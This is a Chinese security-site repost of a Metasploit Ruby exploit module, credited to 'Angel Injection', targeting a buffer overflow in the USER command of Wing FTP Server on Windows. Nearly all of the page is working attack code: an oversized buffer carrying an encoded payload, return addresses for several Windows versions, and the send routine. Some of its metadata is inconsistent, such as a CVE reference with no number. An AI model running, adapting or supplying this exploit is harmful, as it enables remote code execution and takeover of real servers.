首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wing FTP Server USER Buffer Overflow
来源:http://www.metasploit.com 作者:Angel 发布时间:2011-09-09  
##
# $Id: Wing_FTP_Server.rb 10559 2010-10-05 23:41:17Z jduck $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::Ftp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Wing FTP Server USER Buffer Overflow',
            'Description'    => %q{
                    This module exploits a vulnerability in the Wing FTP Server
                application. This package is part of the Wing FTP Server package.
                This module uses the USER command to trigger the overflow.
            },
            'Author'         => [ 'Angel Injection' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10559 
, 'References' => [ [ 'CVE', '2011'], [ 'OSVDB', '15865'], [ 'URL', 'http://www.1337day.com/exploits/'], [ 'BID', '16856'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x0a\x20\x0d", 'StackAdjustment' => -3500, }, 'Platform' => [ 'win' ], 'Targets' => [ [ 'Wing FTP Server', # Tested OK - 8/9/2011 { 'Ret' => 0x0040df98, }, ], [ 'Windows 2000 English', { 'Ret' => 0x75022ac4, }, ], [ 'Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad, # ws2help.dll }, ], [ 'Windows 2003 English', { 'Ret' => 0x7ffc0638, # peb magic :-) }, ], 'DisclosureDate' => '8/9/2011', 'DefaultTarget' => 0)) end def check connect disconnect if (banner =~ /Wing FTP Server/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect print_status("Trying target #{target.name}...") # U push ebp # S push ebx # E inc ebp # R push edx # \x20\xC0 and al, al buf = rand_text_english(8192, payload_badchars) buf[0, 1] = "\xc0" buf[1, payload.encoded.length] = payload.encoded buf[1014, 4] = [ target.ret ].pack('V') send_cmd( ["USER #{buf}"] ) send_cmd( ['HELP'] ) handler disconnect end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP "phar/phar_object.c" forma
·BisonFTP Server Remote Buffer
·N-TRACK Studio universal Local
·Mel0nPlayer 1.0.11.x Denial of
·WVxWorks FTP server Password O
·ScadaTEC ModbusTagServer & Sca
·Ubuntu <= 11.04 ftp client Loc
·KnFTP Server Buffer Overflow E
·DVD X Player 5.5 Pro (SEH DEP
·Aika 0.2 colladaconverter Xml
·Wordpress 1 Flash Gallery Plug
·Wav Player 1.1.3.6 .pll Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved